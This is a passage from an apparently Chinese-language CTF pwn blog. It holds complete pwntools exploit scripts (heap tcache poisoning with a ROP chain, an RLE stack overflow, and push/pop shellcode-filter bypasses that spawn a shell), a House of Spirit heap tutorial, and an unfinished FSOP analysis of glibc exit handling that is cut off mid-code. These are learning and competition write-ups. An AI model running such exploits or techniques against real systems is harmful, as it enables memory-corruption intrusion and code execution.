    elf.address = int.from_bytes(target.recvline().strip(), "little") - 0x5280

    stderr = elf.address + 0x40E0
    arr = elf.address + 0x6200

    target.success(f"pie: {hex(elf.address)}")
    target.success(f"arr: {hex(arr)}")
    target.success(f"stderr: {hex(stderr)}")

    create(0, 0x70)
    create(1, 0x70)
    delete(0)
    delete(1)
    # raw_input("DEBUG")
    create(0x10, 0x70)
    edit(0, 0x10, flat(stderr - 0x40))

    # raw_input("DEBUG")
    create(0, 0x70)
    create(2, 0x70)

    edit(2, 0x10, b"A" * 15)
    show(2)
    target.recvlines(2)
    libc.address = int.from_bytes(target.recvline().strip(), "little") - 0x21B780
    target.success(f"libc: {hex(libc.address)}")

    create(3, 0x70)
    delete(0)
    delete(3)
    create(0x10, 0x70)
    edit(0, 0x10, flat(libc.sym["environ"] - 0x20))

    create(0, 0x70)
    create(4, 0x70)
    edit(4, 0x10, b"A" * 15)
    show(4)

    target.recvline()
    target.recvline()
    stack = int.from_bytes(target.recvline().strip(), "little")
    ret = stack - 0x140
    target.success(f"stack: {hex(stack)}")
    target.success(f"ret: {hex(ret)}")

    create(5, 0x70)
    delete(0)
    delete(5)
    create(0x10, 0x70)
    edit(0, 0x10, flat(ret - 0xA0))

    create(5, 0x70)
    create(0, 0x70)
    create(0x10, 0x70)

    edit(5, 0x10, b"flag\x00\x00\x00\x00")

    flag = elf.address + 0x5210

    rop = ROP(libc)
    payload = flat(
        # open
        rop.rax.address,
        2,
        rop.rdi.address,
        flag,
        rop.rsi.address,
        0,
        rop.find_gadget(["pop rdx", "pop rbx", "ret"])[0],
        0,
        0,
        rop.find_gadget(["syscall", "ret"])[0],
        # read
        rop.rax.address,
        0,
        rop.rdi.address,
        3,
        rop.rsi.address,
        flag,
        rop.find_gadget(["pop rdx", "pop rbx", "ret"])[0],
        0x100,
        0,
        rop.find_gadget(["syscall", "ret"])[0],
        # write
        rop.rax.address,
        1,
        rop.rdi.address,
        1,
        rop.rsi.address,
        flag,
        rop.find_gadget(["pop rdx", "pop rbx", "ret"])[0],
        0x100,
        0,
        rop.find_gadget(["syscall", "ret"])[0],
    )

    raw_input("DEBUG")
    edit(
        0,
        0x200,
        b"A" * 0x60 + payload,
    )

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[DASCTF{21569291958017220875601963459603}]

赛后 bb

感觉这比赛题很难评啊，一道 stack 一道 malloc，两道题没一个能 patch 后在我机器上跑的……一直报错 ./libc.so.6: version 'GLIBC_ABI_DT_RELR' not found (required by /usr/lib/libseccomp.so.2)，怀疑是我 glibc 版本太高了的原因？问运维，告诉我好像全场就我一个人不能跑附件，我？？？？？？？被制裁了（

后来光折腾 docker pwn 环境就花了好几个小时，比赛开始 5 小时后我才刚把题目跑起来，上午问运维要 Dockerfile 下午才拿到，最后发现也没啥用，还得配虚拟机。玛德，这个世界对 archlinux 用户充满了恶意，最后我是用 pwndocker + 零配置的 vim 写的这两题的 exp，别提有多痛苦了……

另外，国内的比赛都是 p 神争霸赛吗，看麻了，非人 vm 题短时间内 30 多解，哥们用 MCP 逆向都逆半天没逆出来，逆向完了还得看半天，怎么做到的？……

屋宇之术：Labyrinth of Houses

Sat, 04 Oct 2025 00:00:00 GMT

House of Spirit

Applicable Range

latest

Principles

人生中的第一个「house」，当然是从 Spirit 开始～

下面直接拿 how2heap 的 example code 来学习了，选择的是 glibc_2.35/house_of_spirit.c：

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

int main() {
  setbuf(stdout, NULL);

  puts("This file demonstrates the house of spirit attack.");
  puts("This attack adds a non-heap pointer into fastbin, thus leading to "
       "(nearly) arbitrary write.");
  puts("Required primitives: known target address, ability to set up the "
       "start/end of the target memory");

  puts("\nStep 1: Allocate 7 chunks and free them to fill up tcache");
  void *chunks[7];
  for (int i = 0; i < 7; i++) {
    chunks[i] = malloc(0x30);
  }
  for (int i = 0; i < 7; i++) {
    free(chunks[i]);
  }

  puts("\nStep 2: Prepare the fake chunk");
  // This has nothing to do with fastbinsY (do not be fooled by the 10) -
  // fake_chunks is just a piece of memory to fulfil allocations (pointed to
  // from fastbinsY)
  long fake_chunks[10] __attribute__((aligned(0x10)));
  printf("The target fake chunk is at %p\n", fake_chunks);
  printf(
      "It contains two chunks. The first starts at %p and the second at %p.\n",
      &fake_chunks[1], &fake_chunks[9]);
  printf("This chunk.size of this region has to be 16 more than the region (to "
         "accommodate the chunk data) while still falling into the fastbin "
         "category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by "
         "free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) "
         "and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
  puts("... note that this has to be the size of the next malloc request "
       "rounded to the internal size used by the malloc implementation. E.g. "
       "on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for "
       "the malloc parameter at the end.");
  printf("Now set the size of the chunk (%p) to 0x40 so malloc will think it "
         "is a valid chunk.\n",
         &fake_chunks[1]);
  fake_chunks[1] = 0x40; // this is the size

  printf("The chunk.size of the *next* fake region has to be sane. That is > "
         "2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for "
         "the main arena) to pass the nextsize integrity checks. No need for "
         "fastbin size.\n");
  printf("Set the size of the chunk (%p) to 0x1234 so freeing the first chunk "
         "can succeed.\n",
         &fake_chunks[9]);
  fake_chunks[9] = 0x1234; // nextsize

  puts("\nStep 3: Free the first fake chunk");
  puts("Note that the address of the fake chunk must be 16-byte aligned.\n");
  void *victim = &fake_chunks[2];
  free(victim);

  puts("\nStep 4: Take out the fake chunk");
  printf("Now the next calloc will return our fake chunk at %p!\n",
         &fake_chunks[2]);
  printf(
      "malloc can do the trick as well, you just need to do it for 8 times.");
  void *allocated = calloc(1, 0x30);
  printf("malloc(0x30): %p, fake chunk: %p\n", allocated, victim);

  assert(allocated == victim);
}

先说效果，这个攻击基本上就是可以令我们 malloc 返回一个任意地址，比如返回栈地址，~然后就可以竭尽所学，做一些瑟瑟的事情了什么？我说的瑟，可是萧瑟的瑟哦～ chill bro~

上面这个程序不难理解吧？就是先把 tcache 的 0x40 bin 填满，确保我们接下来所做的都是针对于 fastbin 的 0x40 bin 。接着关键的地方是设置了两个 fake chunk 的 size，一个是 0x40，紧接着它的 nextchunk size 设置为 0x1234，这是为了过两个检查：

首先是我们不希望进入 __libc_free 中的 chunk_is_mmapped 分支执行 munmap_chunk，所以伪造的第一个 chunk size 的 M (IS_MMAPPED) 位必须为 0。然后进入 _int_free 后我们第一个 chunk 的 size 必须满足 size > MINSIZE，否则会抛出 free(): invalid size，接着由于我们希望进入 fastbin，所以 size 必须在 fastbin 最大支持大小范围内，且 chunk_at_offset(p, size) != av->top，即紧临着的 nextchunk 不能是 top chunk，这就是为什么需要伪造两个 chunk 的原因。最还还不能满足 chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ，即 nextchunk 的大小不能小于等于 chunk header size 和 chunksize (chunk_at_offset (p, size)) >= av->system_mem，即下一个 chunk 的大小大于不能大于当前 arena 内存池大小这两个检测，否则就抛出 free(): invalid next size (fast)。到此为止检测就绕差不多了，然后它会将这个 chunk 放到 fastbin 中，就不过多赘述了。

:::important 注意 NON_MAIN_ARENA 位也会有影响，得设置成 0 告诉 glibc 这是 main arena 的 chunk 。

nextchunk 的大小无关紧要，只要能绕过检测就好了，不一定非得是 fastbin 范围内的大小。 :::

感觉写了一堆没用的，还不如直接看 example code + glibc source code + 自己 debug 理解的透彻……可能是这块内容确实不好写，因为写详细的话必然得贴 glibc 代码片段，考虑到以后还有各种各样其它的 house，肯定会有重复的内容，<s>属于是增加碳排放了，我可是坚定的环保主义者（</s>

好麻烦……后面有时间我再研究研究怎么写吧，也可能会直接删掉，只保留部分内容也说不准？

Write-ups: Securinets CTF Quals 2025

Sat, 04 Oct 2025 00:00:00 GMT

zip++

Information

Category: Pwn
Points: 500

Description

why isn't my compressor compressing ?!

Write-up

问 AI，得知 compress 函数实现了一个 RLE (Run-Length Encoding) 压缩算法，压缩后格式为 [字节 1][重复次数 1][字节 2][重复次数 2]...，因此如果我们输入交替字符就会导致压缩率很差，溢出返回地址。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./main"
HOST, PORT = "pwn-14caf623.p1.securinets.tn", 9000

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"AB" * 0xC6,
        b"\xa6" * 0x11,
    )
    raw_input("DEBUG")
    target.sendafter(b"data to compress :", payload)
    raw_input("DEBUG")
    target.sendline(b"exit")

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[Securinets{my_zip_doesnt_zip}]

push pull pops

Information

Category: Pwn
Points: 500

Description

Shellcoding in the big 25 😱

Write-up

有意思，第一次见 python 写的 pwn 题，这题只允许使用 push, pop 和 int 3 指令，但是测试发现非法指令会导致 capstone 直接返回 None，使得后面的指令不会被检查。所以我们只要把 shellcode 写到非法指令后面即可。

祭出指令表：X86 Opcode and Instruction Reference Home

但是有个问题是，从 mmap 分配的地址开始执行，必定会碰到我们的非法指令，然后就会 abort 。这里的解决方法也很简单，因为我们可以操作栈，那么，我们只要把 rsp 变成 mmap 出来的地址，然后用 pop 先提高栈地址，然后再 push 降低栈地址的同时，也将栈上原先的指令覆盖掉了。用什么覆盖？当然是 nop 啦～

最后说一下怎么调试，我们只要知道这个 python 脚本的 pid 就可以用 gdb -p <pid> 挂载，只要知道 mmap 返回的地址就可以调试 shellcode，还有，善用 int 3 也很重要。

def run(code: bytes):
    # Allocate executable memory using mmap

    mem = mmap.mmap(
        -1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC
    )
    mem.write(code)

    # Create function pointer and execute
    func = ctypes.CFUNCTYPE(ctypes.c_void_p)(
        ctypes.addressof(ctypes.c_char.from_buffer(mem))
    )

    print(
        f"pid is: {os.getpid()}\nmem: {hex(ctypes.addressof(ctypes.c_char.from_buffer(mem)))}"
    )
    input("DEBUG")
    func()

    exit(1)

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    b64e,
    context,
    flat,
    process,
    raw_input,
    remote,
    shellcraft,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./main.py"
HOST, PORT = "localhost", 1337

context(log_level="debug", terminal="kitty", arch="amd64")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    payload = asm(
        """
        push r11
        pop rsp

        pop r15
        pop r15
        pop r15
        pop r15

        push r15
        push r15
        push r15
        """
    )

    payload += b"\x06" + asm(shellcraft.nop()) * 0xF
    payload += asm("add rsp, 0x100")
    payload += asm(shellcraft.sh())

    target.sendline(b64e(payload))

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[Securinets{push_pop_to_hero}]

push pull pops REVENGE

Information

Category: Pwn
Points: 500

Description

you aint getting away with it , not on my watch .

Write-up

这次题目加了输入和解码出来的指令之间的长度检测：

if code_len != decoded:
    print("nice try")
    return False

那就把非法指令 ban 掉了，测试使用 semantically equivalent encodings 也没啥用，绕不开这个长度检测。

最后思路是自己构造一个 syscall，然后调用 read，这样就可以把 shellcode 读进去，不被过滤。

官方的 solution 也是构造 read，不过官方的 wp 里面，syscall 不是自己造的，而是利用内存中现成的，所以只要操作 push，pop 到对应内存就能拿到了。而我这里用的方法就复杂了点，<s>让我们假设内存空间非常贫瘠，寸草不生，根本没有残留的 syscall</s>，那能不能凭空造一个出来？

由于这题也是 mmap 了一块 rwx 的内存，所以只要我们的内存中有 syscall 的机器码，它就能执行到，我们只要在执行前提前布置好调用 read 用到的寄存器即可。

:::caution 由于这道题的特殊性，远程内存环境和本地肯定是大不相同的，因为我们不管是自己造 syscall 还是找现成的，都对内存环境布局有着极其严格的要求，所以这题必须在 docker 里跑，本地远程调试。 :::

首先解决一下调试的问题，我们将容器启动后自动执行的指令改一下，挂上 gdbserver，开放 1234 端口用于调试：

CMD socat TCP-LISTEN:5000,reuseaddr,fork EXEC:/app/run
CMD ["gdbserver", ":1234", "socat", "TCP-LISTEN:5000,reuseaddr,fork", "EXEC:/app/run"]

然后 docker-compose.yml 也需要改，开放一下调试端口：

version: "3.8"

services:
  vertical_tables:
    build: .
    ports:
      - "1304:5000"
      - "1234:1234"
    deploy:
      resources:
        limits:
          cpus: "1"
          memory: 1000M
    read_only: true
    cap_drop:
      - all
    privileged: true

现在只要运行 docker compose up -d 就把容器跑起来了，然后 exp 直接连接 1304 端口与题目交互。

既然要自己造 syscall，那肯定得先搞清楚这玩意儿的机器码是多少，可以这样：

λ ~/ pwn asm -c amd64 "syscall"
0f05

那我们只要想办法弄到 \x0f 和 \x05 就成功了一半。观察内存，发现有一个现成的 \x05：

虽然也有现成的 \x0f，但是它行吗？我们可以做一个简单的测试，直接找一片空内存改，然后看看解析出来是什么指令：

并不是我们期望的 syscall，很简单，因为 amd64 是小端序的，所以我们不能写 \x0f，而是应该写 0x0f00000000000000。

至于为啥必须这样？因为我的想法是找一个带 \x0f 的 push or pop 指令放在最后，然后用一堆单字节的 push or pop 将 \x0f 卡到第八个字节的位置，最后将事先获取到的 \x05 通过 push 覆盖掉前面被挤出来的字节，就有了一个 syscall。

但是我们怎么保证，这样弄到了 syscall，它就一定会执行呢？因为我们不可能跳回到前面 syscall 的地方去执行。这就得益于来自上一题的灵感了，因为如果是非法指令的话，CPU 会卡在那里不往下走，但是一旦我们将非法指令替换成了合法指令，它就又能继续往下跑了～

这里选的指令是 pop fs，实测 push fs 不行。

所以我的 exp 就不难理解了，一开始的 0x4d 个 pop r15 是为了弄到 \x05，保存在 r15 里：

然后设置了调用 read 用到的几个寄存器，rax 不用管，本来就是 0，用它设置一下 rdi，然后利用内存中的残留值设置 rdx，rsi 可以最后栈迁移到 shellcode 的时候设置。

最后就是栈迁移回 shellcode，通过操作 push，pop 定位到要覆盖的指令处，最后将 \x05 填上去即可。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    b64e,
    context,
    flat,
    process,
    raw_input,
    remote,
    shellcraft,
    sleep,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./main.py"
HOST, PORT = "localhost", 1304

context(log_level="debug", terminal="kitty", arch="amd64")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def main():
    launch()

    payload = asm("pop r15") * 0x4D
    payload += asm(
        """
        pop rsp
        pop r15

        push rax
        pop rdi
        """
    )
    payload += asm("pop rbx") * 0x14
    payload += asm("pop rdx")
    payload += asm("push rbx") * 0x1B
    payload += asm(
        """
        push r11
        pop rsi

        push r11
        pop rsp
        """
    )
    payload += asm("pop rbx") * 0x20
    payload += asm("push r15")
    payload += b"\x0f\xa1"

    target.sendline(b64e(payload))
    target.sendline()

    sc = asm(shellcraft.nop() * 0x150 + shellcraft.sh())
    sleep(1)
    target.sendline(sc)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

复现。

V-tables

Information

Category: Pwn
Points: 500

Description

idk

Write-up

这题也是复现，当时我还没学 FSOP，所以就直接跳过了……

看了下官方 wp，发现这种题其实还是有迹可循的。

先看一下 IDA，逻辑特别简单：

void __fastcall setup(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
}

__int64 vuln()
{
  printf("stdout : %p\n", stdout);
  read(0, stdout, 0xD8u);
  return 0;
}

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setup(argc, argv, envp);
  vuln();
  return 0;
}

直接送了 libc 地址，然后可以修改 stdout 结构体，但是由于最大只能读 0xD8 字节，也就是正好覆盖整个 _IO_FILE 结构体，除了 vtable 字段写不到外。那常规的 House of Apple 就打不了了。

那怎么办？我们没有任何可以利用的地方了吗？未必。

先看一下最终的调用链：

熟悉程序生命周期的话，应该知道 main 函数返回其实会自动调用 exit，由于我们也干不了别的事了，那估计多半就是要去分析 exit 的流程找利用点了（有种被引导的感觉）。

exit 的实现如下：

void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

直接跟进到 __run_exit_handlers：

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
       bool run_list_atexit, bool run_dtors)
{
  /* The exit should never return, so there is no need to unlock it.  */
  __libc_lock_lock_recursive (__exit_lock);

  /* First, call the TLS destructors.  */
  if (run_dtors)
    call_function_static_weak (__call_tls_dtors);

  __libc_lock_lock (__exit_funcs_lock);

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (true)
    {
      struct exit_function_list *cur;

    restart:
      cur = *listp;

      if (cur == NULL)
 {
   /* Exit processing complete.  We will not allow any more
      atexit/on_exit registrations.  */
   __exit_funcs_done = true;
   break;
 }

      while (cur->idx > 0)
 {
   struct exit_function *const f = &cur->fns[--cur->idx];
   const uint64_t new_exitfn_called = __new_exitfn_called;

   switch (f->flavor)
     {
       void (*atfct) (void);
       void (*onfct) (int status, void *arg);
       void (*cxafct) (void *arg, int status);
       void *arg;

     case ef_free:
     case ef_us:
       break;
     case ef_on:
       onfct = f->func.on.fn;
       arg = f->func.on.arg;
       PTR_DEMANGLE (onfct);

       /* Unlock the list while we call a foreign function.  */
       __libc_lock_unlock (__exit_funcs_lock);
       onfct (status, arg);
       __libc_lock_lock (__exit_funcs_lock);
       break;
     case ef_at:
       atfct = f->func.at;
       PTR_DEMANGLE (atfct);

       /* Unlock the list while we call a foreign function.  */
       __libc_lock_unlock (__exit_funcs_lock);
       atfct ();
       __libc_lock_lock (__exit_funcs_lock);
       break;
     case ef_cxa:
       /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
   we must mark this function as ef_free.  */
       f->flavor = ef_free;
       cxafct = f->func.cxa.fn;
       arg = f->func.cxa.arg;
       PTR_DEMANGLE (cxafct);

       /* Unlock the list while we call a foreign function.  */
       __libc_lock_unlock (__exit_funcs_lock);
       cxafct (arg, status);
       __libc_lock_lock (__exit_funcs_lock);
       break;
     }

   if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
     /* The last exit function, or another thread, has registered
        more exit functions.  Start the loop over.  */
     goto restart;
 }

      *listp = cur->next;
      if (*listp != NULL)
 /* Don't free the last element in the chain, this is the statically
    allocate element.  */
 free (cur);
    }

  __libc_lock_unlock (__exit_funcs_lock);

  if (run_list_atexit)
    call_function_static_weak (_IO_cleanup);

  _exit (status);
}

没有注意到什么好玩的东西，除了 _IO_cleanup 外，因为它涉及到 IO 操作，可以跟进去看看：

int
_IO_cleanup (void)
{


  int result = _IO_flush_all ();

  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out. */
  _IO_unbuffer_all ();

  return result;
}

此时，就涉及到了两个大函数需要分析，一个是 _IO_flush_all 一个是 _IO_unbuffer_all。

我在分析 _IO_flush_all 的时候没发现什么特别有意思的地方，但是它可以调用 _IO_OVERFLOW，然后这个函数里可以调用 _IO_do_write，于是想到一种方法：利用 main 函数返回自动调用 _IO_cleanup->_IO_flush_all flush _IO_2_1_stdout_ 结构体的时候，假设我们事先将其 _IO_write_base 改成 _IO_2_1_stdin_ 结构体的地址，由于 size 是通过 f->_IO_write_ptr - f->_IO_write_base 计算的，我也可以将其改大，这样让它触发 _IO_do_write，向 _IO_2_1_stdin_ 写任意大小数据，覆盖它的 vtable, （由于 _IO_list_all 链表的顺序是 stderr->stdout->stdin）这样，我 flush 完 stdout 再去 flush stdin 的时候是不是会调用我自定义的 vtable 去执行任意操作？

虽然想法很美好，但是我发现，_IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base)->_IO_SYSWRITE (fp, data, to_do)->__write (f->_fileno, data, to_do)，也就是说，它只能向当前被 flush 的结构体的 _fileno 写数据……那这条路就行不通了。

其实还有一个想法，就是我将 _chain 修改为当前结构体 +0x8 的地址，这样就伪造了下一个被刷新的结构体，因为 +0x8，所以我们也就控制了 vtable，但是我们没有 _flags 的控制权，不知道行不行，只是一个潜在可行的想法，以后可以试试能不能打。

继续看下面的 _IO_unbuffer_all 了，看看能不能有什么发现：

static void
_IO_unbuffer_all (void)
{
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
    {
      int legacy = 0;

      run_fp = fp;
      _IO_flockfile (fp);

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
      if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
 legacy = 1;
#endif

      /* Free up the backup area if it was ever allocated.  */
      if (_IO_have_backup (fp))
 _IO_free_backup_area (fp);
      if (!legacy && fp->_mode > 0 && _IO_have_wbackup (fp))
 _IO_free_wbackup_area (fp);


      if (! (fp->_flags & _IO_UNBUFFERED)
   /* Iff stream is un-orientated, it wasn't used. */
   && (legacy || fp->_mode != 0))
 {
   if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
     {
       fp->_flags |= _IO_USER_BUF;

       fp->_freeres_list = freeres_list;
       freeres_list = fp;
       fp->_freeres_buf = fp->_IO_buf_base;
     }

   _IO_SETBUF (fp, NULL, 0);

   if (! legacy && fp->_mode > 0)
     _IO_wsetb (fp, NULL, NULL, 0);
 }

      /* Make sure that never again the wide char functions can be
  used.  */
      if (! legacy)
 fp->_mode = -1;

      _IO_funlockfile (fp);
      run_fp = NULL;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif
}

注意到沿着 _IO_SETBUF 往下走的话会有一个好玩的东西：

FILE *
_IO_default_setbuf (FILE *fp, char *p, ssize_t len)
{
    if (_IO_SYNC (fp) == EOF)
 return NULL;
    if (p == NULL || len == 0)
      {
 fp->_flags |= _IO_UNBUFFERED;
 _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
      }
    else
      {
 fp->_flags &= ~_IO_UNBUFFERED;
 _IO_setb (fp, p, p+len, 0);
      }
    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = NULL;
    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = NULL;
    return fp;
}

藏在 _IO_SYNC 里面：

int
_IO_new_file_sync (FILE *fp)
{
  ssize_t delta;
  int retval = 0;


  /*    char* ptr = cur_ptr(); */
  if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF;
  delta = fp->_IO_read_ptr - fp->_IO_read_end;
  if (delta != 0)
    {
      off64_t new_pos = _IO_SYSSEEK (fp, delta, 1);
      if (new_pos != (off64_t) EOF)
 fp->_IO_read_end = fp->_IO_read_ptr;
      else if (errno == ESPIPE)
 ; /* Ignore error from unseekable devices. */
      else
 retval = EOF;
    }
  if (retval != EOF)
    fp->_offset = _IO_pos_BAD;
  /* FIXME: Cleanup - can this be shared? */
  /*    setg(base(), ptr, ptr); */
  return retval;
}
libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)

然后走 _IO_do_flush，由于之前已经将 mode 改为了 1，所以这里会执行 _IO_wdo_write，而这，也是我们所期望的。

#define _IO_do_flush(_f)                                        \
  ((_f)->_mode <= 0                                             \
   ? _IO_do_write(_f, (_f)->_IO_write_base,                     \
    (_f)->_IO_write_ptr-(_f)->_IO_write_base)                   \
   : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base,        \
     ((_f)->_wide_data->_IO_write_ptr                           \
      - (_f)->_wide_data->_IO_write_base)))

走到 _IO_wdo_write 就差不多快结束了。

/* Convert TO_DO wide character from DATA to FP.
   Then mark FP as having empty buffers. */
int
_IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
{
  struct _IO_codecvt *cc = fp->_codecvt;



  if (to_do > 0)
    {
      if (fp->_IO_write_end == fp->_IO_write_ptr
   && fp->_IO_write_end != fp->_IO_write_base)
 {
   if (_IO_new_do_write (fp, fp->_IO_write_base,
    fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
     return WEOF;
 }

      do
 {
   enum __codecvt_result result;
   const wchar_t *new_data;
   char mb_buf[MB_LEN_MAX];
   char *write_base, *write_ptr, *buf_end;

   if (fp->_IO_buf_end - fp->_IO_write_ptr < sizeof (mb_buf))
     {
       /* Make sure we have room for at least one multibyte
   character.  */
       write_ptr = write_base = mb_buf;
       buf_end = mb_buf + sizeof (mb_buf);
     }
   else
     {
       write_ptr = fp->_IO_write_ptr;
       write_base = fp->_IO_write_base;
       buf_end = fp->_IO_buf_end;
     }

   /* Now convert from the internal format into the external buffer.  */
   result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
     data, data + to_do, &new_data,
     write_ptr,
     buf_end,
     &write_ptr);

   /* Write out what we produced so far.  */
   if (_IO_new_do_write (fp, write_base, write_ptr - write_base) == EOF)
     /* Something went wrong.  */
     return WEOF;

   to_do -= new_data - data;

   /* Next see whether we had problems during the conversion.  If yes,
      we cannot go on.  */
   if (result != __codecvt_ok
       && (result != __codecvt_partial || new_data - data == 0))
     break;

   data = new_data;
 }
      while (to_do > 0);
    }

  _IO_wsetg (fp, fp->_wide_data->_IO_buf_base, fp->_wide_data->_IO_buf_base,
      fp->_wide_data->_IO_buf_base);
  fp->_wide_data->_IO_write_base = fp->_wide_data->_IO_write_ptr
    = fp->_wide_data->_IO_buf_base;
  fp->_wide_data->_IO_write_end = ((fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
       ? fp->_wide_data->_IO_buf_base
       : fp->_wide_data->_IO_buf_end);

  return to_do == 0 ? 0 : WEOF;
}
libc_hidden_def (_IO_wdo_write)

我们发现下面这个 DL_CALL_FCT 其实是一个函数调用，而这个函数指针和参数我们都可以通过 overlapping 结构体来伪造。

虽然理想的情况是，令 gs 为 /bin/sh 指针，另 __fct 为 system，但是实际调试发现，但凡我们控制其中任意一个，另一个就无法控制了（控制 /bin/sh 的话就不能绕过 PTR_DEMANGLE (fct)，绕过 PTR_DEMANGLE (fct) 的话就不能控制 /bin/sh，而这一切都是因为它汇编层使用的寄存器是 r15，这个可以自己去调试，我不想再都截一遍图了，老实说有点恶心……）。由于任意代码执行的重要性更大，所以我选择控制 __fct，/bin/sh 则通过 add rdi, 0x10; jmp rcx 这个 gadget 控制。

#define DL_CALL_FCT(fctp, args) (fctp) args

enum __codecvt_result
__libio_codecvt_out (struct _IO_codecvt *codecvt, __mbstate_t *statep,
       const wchar_t *from_start, const wchar_t *from_end,
       const wchar_t **from_stop, char *to_start, char *to_end,
       char **to_stop)
{
  enum __codecvt_result result;


  struct __gconv_step *gs = codecvt->__cd_out.step;
  int status;
  size_t dummy;
  const unsigned char *from_start_copy = (unsigned char *) from_start;

  codecvt->__cd_out.step_data.__outbuf = (unsigned char *) to_start;
  codecvt->__cd_out.step_data.__outbufend = (unsigned char *) to_end;
  codecvt->__cd_out.step_data.__statep = statep;


  __gconv_fct fct = gs->__fct;
  if (gs->__shlib_handle != NULL)
    PTR_DEMANGLE (fct);

  status = DL_CALL_FCT (fct,
   (gs, &codecvt->__cd_out.step_data, &from_start_copy,
    (const unsigned char *) from_end, NULL,
    &dummy, 0, 0));

  *from_stop = (wchar_t *) from_start_copy;
  *to_stop = (char *) codecvt->__cd_out.step_data.__outbuf;

  switch (status)
    {
    case __GCONV_OK:
